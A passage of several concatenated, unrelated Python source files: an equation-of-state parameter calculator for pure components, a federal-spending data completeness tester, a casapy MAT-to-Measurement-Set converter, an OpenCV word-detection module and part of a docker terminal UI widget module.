OM] if ICALC == 'constants_eps': Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] if NMODEL == 'SRK': rm = 0.48 + 1.574 * OM - 0.175 * OM**2 del1 = 1.0 elif NMODEL == 'PR': rm = 0.37464 + 1.54226 * OM - 0.26992 * OM ** 2 del1 = 1.0 + np.sqrt(2.0) Zc, OMa, OMb = compressibility_factor_cal(del1) Vceos = (Zc * RGAS * Tc) / Pc ac = OMa * (RGAS * Tc) ** 2 / Pc b = OMb * (RGAS * Tc) / Pc params = [ac, b, rm, del1] # PARAMETERS SPECIFICATION READ [ac, b, rm] if ICALC == 'parameters_eps': ac = dinputs[0] b = dinputs[1] rm = dinputs[2] Tc = (OMb * ac) / (OMa * RGAS * b) Pc = OMb * RGAS * Tc / b Vceos = Zc * RGAS * Tc / Pc if NMODEL == 'SRK': del1 = 1.0 al = -0.175 be = 1.574 ga = 0.48 - rm elif NMODEL == 'PR': del1 = 1.0 + np.sqrt(2.0) al = -0.26992 be = 1.54226 ga = 0.37464 - rm OM = acentric_factor_cal(al, be, ga) constants = [Tc, Pc, OM, Vceos] elif NMODEL == 'RKPR': if ICALC == 'constants_eps': # CONSTANTS SPECIFICATION READ [Tc, Pc, OM, Vceos] Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] Vceos = dinputs[3] Zc = Pc * Vceos / (RGAS * Tc) del1ini = D[0] + D[1] * (D[2] - Zc) ** D[3] + D[4] * (D[2] - Zc)** D[5] print('del1ini = {0}'.format(del1ini)) delta_1 = getdel1(Zc, del1ini)[0] Zc, OMa, OMb = compressibility_factor_cal(delta_1) print('Zc = {0}'.format(Zc)) ac = OMa * (RGAS * Tc) ** 2 / Pc b = OMb * (RGAS * Tc) / Pc # calcular rk rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() rk_cal = eos_calculation.resolver_rk_cal(rk, delta_1, Pvdat, Pc, Tc, Tr) # rk = 1 params = [ac, b, rk, delta_1] elif ICALC == 'parameters_eps': # PARAMETERS SPECIFICATION READ [ac, b, rk, del1] ac = dinputs[0] b = dinputs[1] del1 = dinputs[2] rk = dinputs[3] Zc, OMa, OMb = compressibility_factor_cal(del1) Tc = OMb * ac / (OMa * RGAS * b) Pc = OMb * RGAS * Tc / b Vceos = Zc * RGAS * Tc / Pc al = A1 * Zc + A0 be = B1 * Zc + B0 ga = C1 * Zc + C0 - rk OM = acentric_factor_cal(al, be, ga) constants = [Tc, Pc, OM, Vceos] elif ICALC == 'rk_param': # CONSTANTS SPECIFICATION and del1 READ [Tc, Pc, OM, del1] Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] delta_1 = dinputs[7] rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() rk_cal = eos_calculation.resolver_rk_cal(rk, delta_1, Pvdat, Pc, Tc, Tr) elif ICALC == 'density': # CONSTANTS SPECIFICATION and (T, RhoLsat) READ [Tc, Pc, OM, del1, T, RHOLsat] # Trho = T / Tc, read initial value of del1 Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] delta_1 = dinputs[3] T_especific = dinputs[4] RHOLSat_esp = dinputs[5] rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() delta_1_parameter = eos_calculation.resolver_delta_1_cal(delta_1, rk, Pvdat, RHOLSat_esp, Pc, Tc, Tr) print('The NMODEL is eos_{0} and method ICALC is {1}'.format(NMODEL, ICALC)) if ICALC == 'constants_eps': print("params = [ac, b, rm, del1]") #ac, b, rm, del1 = params #print("ac = {0} b = {1} rm = {2} del1 = {3}".format(ac, b, rm, del1)) return params elif ICALC == 'parameters_eps': print("constants = [Tc, Pc, OM, Vceos]") print(constants) return constants elif ICALC == 'rk_param': print('The parameter rk_cal is {0}'.format(rk_cal)) return rk_cal elif ICALC == 'density': print('The parameter delta1(rho,T) = {0}'.format(delta_1_parameter)) return delta_1_parameter # ---------------------------------------------------------------------------------- component = "ISOBUTANE" NMODEL = "RKPR" ICALC = "constants_eps" # ICALC = "density" sustance_pure = ClassName(component, NMODEL, ICALC) pure = sustance_pure.properties_component() print(pure) # ---------------------------------------------------------------------------------- properties_data = Data_parse() # properties_component = properties_data.selec_component(dppr_file, component) properties_component = properties_data.selec_component(component) print_properties_component(component, properties_component) dinputs = np.array([properties_component[1]['Tc'], properties_component[1]['Pc'], properties_component[1]['Omega'], properties_component[1]['Vc']]) def data_in(ICALC, dinputs): if ICALC == 'constants_eps': # CONSTANTS SPECIFICATION (Tc,Pc,OM,Vceos) Tc, Pc, OM, Vceos = dinputs[0], dinputs[1], dinputs[2], dinputs[3] if ICALC == 'parameters_eps': ac, b, del1, rk = dinputs[0], dinputs[1], dinputs[2], dinputs[3] if ICALC == 'rk_param': # dinputs = np.array([Tc, Pc, OM, dc, zrat, ac, b, d, rk]) Tc, Pc, OM, Vceos, delta_1 = dinputs[0], dinputs[1], dinputs[2], dinputs[3], dinputs[7] if ICALC == 'density': Tc, Pc, omega, Vceos, delta_1 = dinputs[0], dinputs[1], dinputs[2], dinputs[3], dinputs[4] T_especific, RHOLSat_esp = dinputs[5], dinputs[6] sustance_pure.models_eos_cal(NMODEL, ICALC, dinputs) def main(): print("-" * 79) # component = 'METHANE' # component = "ETHANE" # component = "3-METHYLHEPTANE" # component = "n-PENTACOSANE" component = "ISOBUTANE" #NMODEL = "RKPR" NMODEL = "PR" ICALC = "constants_eps" # ICALC = "density" properties_data = Data_parse() # properties_component = properties_data.selec_component(dppr_file, component) properties_component = properties_data.selec_component(component) print_properties_component(component, properties_component) dinputs = np.array([properties_component[1]['Tc'], properties_component[1]['Pc'], properties_component[1]['Omega'], properties_component[1]['Vc']]) component_eos = models_eos_cal(NMODEL, ICALC, dinputs) # print(component_eos[0]) print('-' * 79) #if __name__ == '__main__': # main() # ------------------------------------------------------------------------
#!/bin/python import sys, csv, os, imp, pickle from settings import * from completeness.statlib import stats from decimal import Decimal import doctest BOOKMARK = 'completeness/bookmark.pickle' def success_rate(year): f = open('completeness/output/%d.pickle' % year, 'r') obj = pickle.load(f) f.close() program_totals = {} for program in obj: program_sum = 0 program_total = 0 if program!='__all__': for (test, result) in obj[program].items(): test_name = test.replace('metric_completeness.', '') # if test_name=='obligation_action_date_is_properly_formatted': if result.tests_completed_without_error>0: rate = (result.sum / (result.tests_completed_without_error * 1.0)) else: rate = 0 print "%7s %20s %f" % (program, test_name, rate) program_sum += result.sum program_total += result.tests_completed_without_error if program_total > 0: program_totals[program] = program_sum / (program_total * 1.0) for (p, r) in program_totals.items(): print "%7s %f" % (p, r) class Result(object): """ Stores the results of our metric tests. A bit fancier than a dict. """ def __init__(self, result_type="boolean"): super(Result, self).__init__() self.result_type = result_type self.tests_run = 0 self.tests_completed_without_error = 0 self.failed_tests = 0 self.dollars_sum = 0 self.dollars_of_passed_tests = 0 self.dollars_of_failed_tests = 0 self.sum = 0 self.values = [] if result_type in ('real', 'integer'): self.mean = None self.std_dev = None if self.result_type is 'integer': self.histogram = {} def record_attempt(self): """ To be called prior to running the metric/test """ self.tests_run += 1 def record_success(self): """ To be called after the successful completion of the metric/test """ self.tests_completed_without_error += 1 def record_val(self, val, *args, **kwargs): """ To be passed the result of the metric/test """ if kwargs.has_key('dollars') and kwargs['dollars'] is not None: self.dollars_sum += abs(kwargs['dollars']) if val is False: self.failed_tests += 1 if self.result_type is 'boolean': if val is True: self.sum += 1 if kwargs.has_key('dollars') and kwargs['dollars'] is not None: self.dollars_of_passed_tests += abs(kwargs['dollars']) elif val is False: if kwargs.has_key('dollars') and kwargs['dollars'] is not None: self.dollars_of_failed_tests += abs(kwargs['dollars']) else: self.sum += val self.values.append(val) if self.result_type is 'integer': if not self.histogram.has_key(val): self.histogram[val] = 0 self.histogram[val] += 1 def finish(self): if self.result_type in ('integer', 'real'): if len(self.values)>0: self.mean = stats.mean(self.values) if len(self.values)>1: self.std_dev = stats.stdev(self.values) self.count = len(self.values) # this should be the same as self.tests_completed_without_error, but is a little clearer for adding stats del self.values # no need to keep all that garbage self.values = [] # main tester object class MetricTester(object): """ Performs specified tests on rows >>> m = MetricTester() '' """ def __init__(self): super(MetricTester, self).__init__() self.finished = False self.results = {} self.results['__all__'] = Result() self.misreported_dollars = {} self.total_dollars = {} # bootstrap tests self.metrics = {} for filename in os.listdir('./completeness/metrics'): if filename[-3:]==".py" and not "__init__" in filename: module_name = filename[:-3] m = __import__('completeness.metrics.%s' % module_name) for candidate_name in dir(m.metrics.metric_completeness): candidate = getattr(m.metrics.metric_completeness, candidate_name) if callable(candidate): if getattr(candidate, 'is_metric', False): self.metrics["%s.%s" % (module_name, candidate_name)] = candidate def record_dollars(self, cfda_program, misreported_dollars, total_dollars): if not self.misreported_dollars.has_key(cfda_program): self.misreported_dollars[cfda_program] = 0 self.misreported_dollars[cfda_program] += abs(misreported_dollars) if not self.total_dollars.has_key(cfda_program): self.total_dollars[cfda_program] = 0 self.total_dollars[cfda_program] += abs(total_dollars) def _row_to_dict(self, row): """ Turns the incoming row into a hash for ease of use """ r = {} for (field_index, field_name) in enumerate(CANONICAL_FIELD_ORDER): if field_index < len(row): r[field_name] = row[field_index] return r def run_metrics(self, row): """ runs the specified metrics/tests on the passed row (which is a dict) """ self.finished = False # if necessary, convert to a hash for convenience of the metric test functions if type(row) is list: row = self._row_to_dict(row) dollars = None try: amt = len(str(row['fed_funding_amount']).strip())>0 and str(row['fed_funding_amount']) or '0' dollars = Decimal(amt) except Exception, e: dollars = 0 row_all_clean = True for (metric_name, metric_func) in self.metrics.items(): # set up necessary hashes and result objects cfda_number = row['cfda_program_num'] if not self.results.has_key(cfda_number): self.results[cfda_number] = {} if not self.results[cfda_number].has_key('__all__'): self.results[cfda_number]['__all__'] = Result() if not self.results[cfda_number].has_key('__byrow__'): self.results[cfda_number]['__byrow__'] = Result() if not self.results[cfda_number].has_key(metric_name): self.results[cfda_number][metric_name] = Result(result_type=metric_func.metric_type) mf = metric_func(row) for t in (self.results[cfda_number][metric_name], self.results[cfda_number]['__all__'], self.results['__all__']): t.record_attempt() t.record_val(mf, dollars=dollars) t.record_success() row_all_clean = row_all_clean and mf # record by-row metric -- if it passed all tests, it's okay # this lets us only count problem rows once if row_all_clean: self.record_dollars(cfda_program=cfda_number, misreported_dollars=0, total_dollars=dollars) else: self.record_dollars(cfda_program=cfda_number, misreported_dollars=dollars, total_dollars=dollars) def finish(self): """ calculate aggregate values """ for cfda_program_num in self.results: if cfda_program_num!='__all__': for metric in self.results[cfda_program_num].keys(): self.results[cfda_program_num][metric].finish() self.results['__all__'].finish() self.finished = True def emit(self, filename=None): """ spits out a pickled object of the results """ if not self.finished: self.finish() if filename is None: return pickle.dumps(self.results) else: f = open(filename, 'w') pickle.dump(self.results, f) f.close() def emit_dollars(self, filename_misreported, filename_total): f = open(filename_misreported, 'w') pickle.dump(self.misreported_dollars, f) f.close() f = open(filename_total, 'w') pickle.dump(self.total_dollars, f) f.close() def main_csv(): for year in FISCAL_YEARS: print "Processing FAADS results for %d" % year mtester = MetricTester() f = open('completeness/csv/%d.csv' % year, 'r') reader = csv.reader(f) i = 0 for row in reader: row = mtester._row_to_dict(row) mtester.run_metrics(row) if (i%10000)==0: print " processing record %d" % i i += 1 f.close() mtester.emit(filename='completeness/output/%d.pickle' % year) mtester.emit_dollars(filename_misreported='completeness/output/%d-dollars_misreported.pickle' % year, filename_total='completeness/output/%d-dollars_total.pickle' % year) def main(): main_csv() if __name__ == '__main__': if '--test' in sys.argv: doctest.testmod()
#!/usr/bin/env python # Run using: # casapy --nologger --nogui --log2term -c mat_to_ms <MAT name> <input MS template> <output MS name> import os import sys import scipy import scipy.io import collections import numpy as np # http://stackoverflow.com/questions/7008608/scipy-io-loadmat-nested-structures-i-e-dictionaries def loadmat(filename): ''' this function should be called instead of direct scipy.io.loadmat as it cures the problem of not properly recovering python dictionaries from mat files. It calls the function check keys to cure all entries which are still mat-objects ''' data = scipy.io.loadmat(filename, struct_as_record=False, squeeze_me=False) return _check_keys(data) def _check_keys(dict): ''' checks if entries in dictionary are mat-objects. If yes todict is called to change them to nested dictionaries ''' for key in dict: if isinstance(dict[key], np.ndarray): for i in dict[key]: if isinstance(i[0], scipy.io.matlab.mio5_params.mat_struct): dict[key] = _todict(i[0]) return dict def _todict(matobj): ''' A recursive function which constructs from matobjects nested dictionaries ''' dict = collections.OrderedDict() for strg in matobj._fieldnames: elem = matobj.__dict__[strg] #print strg, type(elem), elem.shape if isinstance(elem, np.ndarray) and elem.size > 0: if isinstance(elem[0][0], scipy.io.matlab.mio5_params.mat_struct): dict[strg] = _todict(elem[0][0]) else: dict[strg] = elem elif isinstance(elem, scipy.io.matlab.mio5_params.mat_struct): dict[strg] = _todict(elem) else: dict[strg] = elem return dict def add_model_data(): # Add the model data column and initialise to zero. model_desc = { 'MODEL_DATA': { 'comment': 'model data', 'dataManagerGroup': 'ModelTiled', 'dataManagerType': 'TiledShapeStMan', 'maxlen': 0, 'ndim': 2, 'option': 0, 'valueType': 'complex' } } model_dminfo = { '*6': { 'COLUMNS': np.array(['MODEL_DATA'], dtype='|S11'), 'NAME': 'ModelTiled', 'SEQNR': 5, 'SPEC': { 'ActualMaxCacheSize': 0, 'DEFAULTTILESHAPE': np.array([1, 1, 64262], dtype=np.int32), 'HYPERCUBES': { '*1': { 'BucketSize': 514096, 'CellShape': np.array([1, 1], dtype=np.int32), 'CubeShape': np.array([1, 1, 1606550], dtype=np.int32), 'ID': {}, 'TileShape': np.array([1, 1, 64262], dtype=np.int32) } }, 'IndexSize': 1, 'MAXIMUMCACHESIZE': 0, 'SEQNR': 5 }, 'TYPE': 'TiledShapeStMan' } } tb.addcols(model_desc, model_dminfo) tb.putcol('MODEL_DATA', np.zeros((1, 1, tb.nrows()), dtype='c16')) def add_corrected_data(): # Add the corrected data column and initialise to zero. cor_desc = { 'CORRECTED_DATA': { 'comment': 'corrected data', 'dataManagerGroup': 'CorrectedTiled', 'dataManagerType': 'TiledShapeStMan', 'maxlen': 0, 'ndim': 2, 'option': 0, 'valueType': 'complex' } } cor_dminfo = { '*7': { 'COLUMNS': np.array(['CORRECTED_DATA'], dtype='|S15'), 'NAME': 'CorrectedTiled', 'SEQNR': 6, 'SPEC': { 'ActualMaxCacheSize': 0, 'DEFAULTTILESHAPE': np.array([1, 1, 64262], dtype=np.int32), 'HYPERCUBES': { '*1': { 'BucketSize': 514096, 'CellShape': np.array([1, 1], dtype=np.int32), 'CubeShape': np.array([1, 1, 1606550], dtype=np.int32), 'ID': {}, 'TileShape': np.array([1, 1, 64262], dtype=np.int32) } }, 'IndexSize': 1, 'MAXIMUMCACHESIZE': 0, 'SEQNR': 6 }, 'TYPE': 'TiledShapeStMan' } } tb.addcols(cor_desc, cor_dminfo) tb.putcol('CORRECTED_DATA', np.zeros((1, 1, tb.nrows()), dtype='c16')) def copy_ms(ms_in, ms_out): """Make a copy of a MS without copying any rows of the main table.""" tb.open(ms_in, nomodify=True) tbcopy = tb.copy(ms_out, deep=True, valuecopy=True, norows=True, returnobject=False) if tbcopy: tbcopy.close() # Copy all subtables intact. sub_tables = tb.getkeywords() tb.close() for s in sorted(sub_tables): if str(sub_tables[s]).startswith('Table'): if s == 'SORTED_TABLE': continue print 'Copying', ms_in + '/' + s, 'to', ms_out + '/' + s tb.open(ms_in + '/' + s) tbcopy = tb.copy(ms_out + '/' + s, deep=True, valuecopy=True, norows=False, returnobject=False) if tbcopy: tbcopy.close() tb.close() if __name__ == '__main__': # Get MAT file name and MS names from command line. mat_name = sys.argv[-3] template_name = sys.argv[-2] ms_name = sys.argv[-1] # Load the MAT file into a dictionary. d = loadmat(mat_name) # Copy the input (template) MS to a new one. copy_ms(template_name, ms_name) # Open the output MS. print "Opening table", ms_name tb.open(ms_name, nomodify=False) # Check if corrected data or model data columns should be added. if 'CORRECTED_DATA' in d and not 'CORRECTED_DATA' in tb.colnames(): print "Adding corrected data" add_corrected_data() if 'MODEL_DATA' in d and not 'MODEL_DATA' in tb.colnames(): print "Adding model data" add_model_data() # Iterate the dictionary (all the columns). found_length = 0 for k in d: # Check if column exists in the main table. if k in tb.colnames(): req_length = d[k].shape[-1] if found_length == 0: if req_length == 0: continue print "Adding rows", req_length tb.addrows(req_length) found_length = 1 elif req_length > 0 and req_length != tb.nrows(): raise RuntimeError("Inconsistent row dimension!") if req_length > 0: print "Putting column", k, type(d[k]), d[k].shape, d[k].dtype tb.putcol(k, d[k]) print "Closing table" tb.close()
# -*- coding: utf-8 -*- """ Detect words on the page return array of words' bounding boxes """ import numpy as np import matplotlib.pyplot as plt import cv2 from .helpers import * def detection(image, join=False): """Detecting the words bounding boxes. Return: numpy array of bounding boxes [x, y, x+w, y+h] """ # Preprocess image for word detection blurred = cv2.GaussianBlur(image, (5, 5), 18) edge_img = _edge_detect(blurred) ret, edge_img = cv2.threshold(edge_img, 50, 255, cv2.THRESH_BINARY) bw_img = cv2.morphologyEx(edge_img, cv2.MORPH_CLOSE, np.ones((15,15), np.uint8)) return _text_detect(bw_img, image, join) def sort_words(boxes): """Sort boxes - (x, y, x+w, y+h) from left to right, top to bottom.""" mean_height = sum([y2 - y1 for _, y1, _, y2 in boxes]) / len(boxes) boxes.view('i8,i8,i8,i8').sort(order=['f1'], axis=0) current_line = boxes[0][1] lines = [] tmp_line = [] for box in boxes: if box[1] > current_line + mean_height: lines.append(tmp_line) tmp_line = [box] current_line = box[1] continue tmp_line.append(box) lines.append(tmp_line) for line in lines: line.sort(key=lambda box: box[0]) return lines def _edge_detect(im): """ Edge detection using sobel operator on each layer individually. Sobel operator is applied for each image layer (RGB) """ return np.max(np.array([_sobel_detect(im[:,:, 0]), _sobel_detect(im[:,:, 1]), _sobel_detect(im[:,:, 2])]), axis=0) def _sobel_detect(channel): """Sobel operator.""" sobelX = cv2.Sobel(channel, cv2.CV_16S, 1, 0) sobelY = cv2.Sobel(channel, cv2.CV_16S, 0, 1) sobel = np.hypot(sobelX, sobelY) sobel[sobel > 255] = 255 return np.uint8(sobel) def union(a,b): x = min(a[0], b[0]) y = min(a[1], b[1]) w = max(a[0]+a[2], b[0]+b[2]) - x h = max(a[1]+a[3], b[1]+b[3]) - y return [x, y, w, h] def _intersect(a,b): x = max(a[0], b[0]) y = max(a[1], b[1]) w = min(a[0]+a[2], b[0]+b[2]) - x h = min(a[1]+a[3], b[1]+b[3]) - y if w<0 or h<0: return False return True def _group_rectangles(rec): """ Uion intersecting rectangles. Args: rec - list of rectangles in form [x, y, w, h] Return: list of grouped ractangles """ tested = [False for i in range(len(rec))] final = [] i = 0 while i < len(rec): if not tested[i]: j = i+1 while j < len(rec): if not tested[j] and _intersect(rec[i], rec[j]): rec[i] = union(rec[i], rec[j]) tested[j] = True j = i j += 1 final += [rec[i]] i += 1 return final def _text_detect(img, image, join=False): """Text detection using contours.""" small = resize(img, 2000) # Finding contours mask = np.zeros(small.shape, np.uint8) cnt, hierarchy = cv2.findContours(np.copy(small), cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE) index = 0 boxes = [] # Go through all contours in top level while (index >= 0): x,y,w,h = cv2.boundingRect(cnt[index]) cv2.drawContours(mask, cnt, index, (255, 255, 255), cv2.FILLED) maskROI = mask[y:y+h, x:x+w] # Ratio of white pixels to area of bounding rectangle r = cv2.countNonZero(maskROI) / (w * h) # Limits for text if (r > 0.1 and 1600 > w > 10 and 1600 > h > 10 and h/w < 3 and w/h < 10 and (60 // h) * w < 1000): boxes += [[x, y, w, h]] index = hierarchy[0][index][0] if join: # Need more work boxes = _group_rectangles(boxes) # image for drawing bounding boxes small = cv2.cvtColor(small, cv2.COLOR_GRAY2RGB) bounding_boxes = np.array([0,0,0,0]) for (x, y, w, h) in boxes: cv2.rectangle(small, (x, y),(x+w,y+h), (0, 255, 0), 2) bounding_boxes = np.vstack((bounding_boxes, np.array([x, y, x+w, y+h]))) implt(small, t='Bounding rectangles') boxes = bounding_boxes.dot(ratio(image, small.shape[0])).astype(np.int64) return boxes[1:] def textDetectWatershed(thresh): """NOT IN USE - Text detection using watershed algorithm. Based on: http://docs.opencv.org/trunk/d3/db4/tutorial_py_watershed.html """ img = cv2.cvtColor(cv2.imread("data/textdet/%s.jpg" % IMG), cv2.COLOR_BGR2RGB) img = resize(img, 3000) thresh = resize(thresh, 3000) # noise removal kernel = np.ones((3,3),np.uint8) opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 3) # sure background area sure_bg = cv2.dilate(opening,kernel,iterations=3) # Finding sure foreground area dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5) ret, sure_fg = cv2.threshold(dist_transform, 0.01*dist_transform.max(), 255, 0) # Finding unknown region sure_fg = np.uint8(sure_fg) unknown = cv2.subtract(sure_bg,sure_fg) # Marker labelling ret, markers = cv2.connectedComponents(sure_fg) # Add one to all labels so that sure background is not 0, but 1 markers += 1 # Now, mark the region of unknown with zero markers[unknown == 255] = 0 markers = cv2.watershed(img, markers) implt(markers, t='Markers') image = img.copy() gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) for mark in np.unique(markers): # mark == 0 --> background if mark == 0: continue # Draw it on mask and detect biggest contour mask = np.zeros(gray.shape, dtype="uint8") mask[markers == mark] = 255 cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] c = max(cnts, key=cv2.contourArea) # Draw a bounding rectangle if it contains text x,y,w,h = cv2.boundingRect(c) cv2.drawContours(mask, c, 0, (255, 255, 255), cv2.FILLED) maskROI = mask[y:y+h, x:x+w] # Ratio of white pixels to area of bounding rectangle r = cv2.countNonZero(maskROI) / (w * h) # Limits for text if r > 0.2 and 2000 > w > 15 and 1500 > h > 15: cv2.rectangle(image, (x, y),(x+w,y+h), (0, 255, 0), 2) implt(image)
""" Info widgets: * display detailed info about an object """ import logging import pprint import threading import urwid import urwidtrees from sen.tui.widgets.list.base import WidgetBase from urwid.decoration import BoxAdapter from sen.tui.chunks.elemental import LayerWidget, ContainerStatusWidget, ContainerOneLinerWidget from sen.tui.widgets.graph import ContainerInfoGraph from sen.tui.widgets.list.util import get_map, RowWidget, UnselectableRowWidget from sen.tui.widgets.table import assemble_rows from sen.tui.widgets.util import SelectableText, ColorText, UnselectableListBox from sen.util import humanize_bytes, log_traceback logger = logging.getLogger(__name__) class TagWidget(SelectableText): """ so we can easily access image and tag """ def __init__(self, docker_image, tag): self.docker_image = docker_image self.tag = tag super().__init__(str(self.tag)) class ImageInfoWidget(WidgetBase): """ display info about image """ def __init__(self, ui, docker_image): self.walker = urwid.SimpleFocusListWalker([]) super().__init__(ui, self.walker) self.docker_image = docker_image # self.widgets = [] self.refresh() self.set_focus(0) # or assemble list first and then stuff it into walker def refresh(self): # TODO: refresh when something changes self._basic_data() self._containers() self._image_names() self._layers() self._labels() @property def focused_docker_object(self): # TODO: enable removing image names try: return self.focus.columns.widget_list[0].docker_container except AttributeError: try: return self.focus.columns.widget_list[0].docker_image except AttributeError: return None def _basic_data(self): data = [ [SelectableText("Id", maps=get_map("main_list_green")), SelectableText(self.docker_image.image_id)], [SelectableText("Created", maps=get_map("main_list_green")), SelectableText("{0}, {1}".format(self.docker_image.display_formal_time_created(), self.docker_image.display_time_created()))], [SelectableText("Size", maps=get_map("main_list_green")), SelectableText(humanize_bytes(self.docker_image.size))], [SelectableText("Command", maps=get_map("main_list_green")), SelectableText(self.docker_image.container_command)], ] self.walker.extend(assemble_rows(data, ignore_columns=[1])) def _image_names(self): if not self.docker_image.names: return self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Image Names", maps=get_map("main_list_white"))])) for n in self.docker_image.names: self.walker.append(RowWidget([TagWidget(self.docker_image, n)])) def _layers(self): self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Layers", maps=get_map("main_list_white"))])) i = self.docker_image index = 0 self.walker.append(RowWidget([LayerWidget(self.ui, self.docker_image, index=index)])) while True: index += 1 parent = i.parent_image if parent: self.walker.append(RowWidget([LayerWidget(self.ui, parent, index=index)])) i = parent else: break def _labels(self): if not self.docker_image.labels: return [] data = [] self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Labels", maps=get_map("main_list_white"))])) for label_key, label_value in self.docker_image.labels.items(): data.append([SelectableText(label_key, maps=get_map("main_list_green")), SelectableText(label_value)]) self.walker.extend(assemble_rows(data, ignore_columns=[1])) def _containers(self): if not self.docker_image.containers(): return self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Containers", maps=get_map("main_list_white"))])) for container in self.docker_image.containers(): self.walker.append(RowWidget([ContainerOneLinerWidget(self.ui, container)])) class Process: """ single process returned for container.stats() query so we can hash the object """ def __init__(self, data): self.data = data @property def pid(self): return self.data["PID"] @property def ppid(self): return self.data["PPID"] @property def command(self): return self.data["COMMAND"] def __str__(self): return "[{}] {}".format(self.pid, self.command) def __repr__(self): return self.__str__() class ProcessList: """ util functions for process returned by container.stats() """ def __init__(self, data): self.data = [Process(x) for x in data] self._nesting = {x.pid: [] for x in self.data} for x in self.data: try: self._nesting[x.ppid].append(x) except KeyError: pass logger.debug(pprint.pformat(self._nesting, indent=2)) self._pids = [x.pid for x in self.data] self._pid_index = {x.pid: x for x in self.data} def get_parent_process(self, process): return self._pid_index.get(process.ppid, None) def get_root_process(self): # FIXME: error handling root_process = [x for x in self.data if x.ppid not in self._pids] return root_process[0] def get_first_child_process(self, process): try: return self._nesting[process.pid][0] except (KeyError, IndexError): return def get_last_child_process(self, process): try: return self._nesting[process.pid][-1] except (KeyError, IndexError): return def get_next_sibling(self, process): children = self._nesting.get(process.ppid, []) if len(children) <= 0: return None try: p = children[children.index(process) + 1] except IndexError: return return p def get_prev_sibling(self, process): children = self._nesting.get(process.ppid, []) if len(children) <= 0: return None logger.debug("prev of %s has children %s", process, children) prev_idx = children.index(process) - 1 if prev_idx < 0: # when this code path is not present, tree navigation is seriously messed up return None else: return children[prev_idx] class ProcessTreeBackend(urwidtrees.Tree): def __init__(self, data): """ :param data: dict, response from container.top() """ super().__init__() self.data = data self.process_list = ProcessList(data) self.root = self.process_list.get_root_process() def __getitem__(self, pos): logger.debug("do widget for %s", pos) return RowWidget([SelectableText(str(pos))]) # Tree API def parent_position(self, pos): v = self.process_list.get_parent_process(pos) logger.debug("parent of %s is %s", pos, v) return v def first_child_position(self, pos): logger.debug("first child process for %s", pos) v = self.process_list.get_first_child_process(pos) logger.debug("first child of %s is %s", pos, v) return v def last_child_position(self, pos): v = self.process_list.get_last_child_process(pos) logger.debug("last child of %s is %s", pos, v) return v def next_sibling_position(self, pos): v = self.process_list.get_next_sibling(pos) logger.debug("next of %s is %s", pos, v) return v def prev_sibling_position(self, pos): v = self.process_list.get_prev_sibling(pos) logger.debug("prev of %s is %s", pos, v) return v class ProcessTree(urwidtrees.TreeBox): def __init__(self, data): tree = ProcessTreeBackend(data) # We hide the usual arrow tip and use a customized collapse-icon. t = urwidtrees.ArrowTree( tree, arrow_att="tree", # lines, tip icon_collapsed_att="tree", # + icon_expanded_att="tree", # - icon_frame_att="tree", # [ ] ) super().__init__(t) class ContainerInfoWidget(WidgetBase): """ display info about container """ def __init__(self, ui, docker_container): self.walker = urwid.SimpleFocusListWalker([]) super().__init__(ui, self.walker) self.docker_container = docker_container self.stop = threading.Event() self.refresh() self.set_focus(0) # or assemble list first and then stuff it into walker def refresh(self): self._basic_data() self._net() self._image() self._process_tree() self._resources() self._labels() self._logs() @property def focused_docker_object(self): try: return self.focus.columns.widget_list[0].docker_image except AttributeError: return None def _basic_data(self): data = [ [SelectableText("Id", maps=get_map("main_list_green")), SelectableText(self.docker_container.container_id)], [SelectableText("Status", maps=get_map("main_list_green")), ContainerStatusWidget(self.docker_container)], [SelectableText("Created", maps=get_map("main_list_green")), SelectableText("{0}, {1}".format(self.docker_container.display_formal_time_created(), self.docker_container.display_time_created()))], [SelectableText("Command", maps=get_map("main_list_green")), SelectableText(self.docker_container.command)], ] if self.docker_container.names: data.append( [SelectableText("Name", maps=get_map("main_list_green")), SelectableText("".join(self.docker_container.names))], ) self.walker.extend(assemble_rows(data, ignore_columns=[1])) def _net(self): ports = self.docker_container.net.ports data = [] if ports: data.extend([[SelectableText("")], [ SelectableText("Host Port", maps=get_map("main_list_white")), SelectableText("Container Port", maps=get_map("main_list_white")) ]]) for container_port, host_port in ports.items(): if host_port and container_port: data.append([ SelectableText(host_port), SelectableText(container_port) ]) ips = self.docker_container.net.ips logger.debug(ips) if ips: data.extend([[SelectableText("")], [ SelectableText("Network Name", maps=get_map("main_list_white")), SelectableText("IP Address", maps=get_map("main_list_white")) ]]) for net_name, net_data in ips.items(): a4 = net_data.get("ip_address4", "none") a6 = net_data.get("ip_address6", "") data.append([ SelectableText(net_name), SelectableText(a4) ]) if a6: data.append([ SelectableText(net_name), SelectableText(a6) ]) if data: self.walker.extend(assemble_rows(data, dividechars=3, ignore_columns=[1])) def _image(self): self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Image", maps=get_map("main_list_white"))])) self.walker.append(RowWidget([LayerWidget(self.ui, self.docker_container.image)])) def _resources(self): self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Resource Usage", maps=get_map("main_list_white"))])) cpu_g = ContainerInfoGraph("graph_lines_cpu_tips", "graph_lines_cpu") mem_g = ContainerInfoGraph("graph_lines_mem_tips", "graph_lines_mem") blk_r_g = ContainerInfoGraph("graph_lines_blkio_r_tips", "graph_lines_blkio_r") 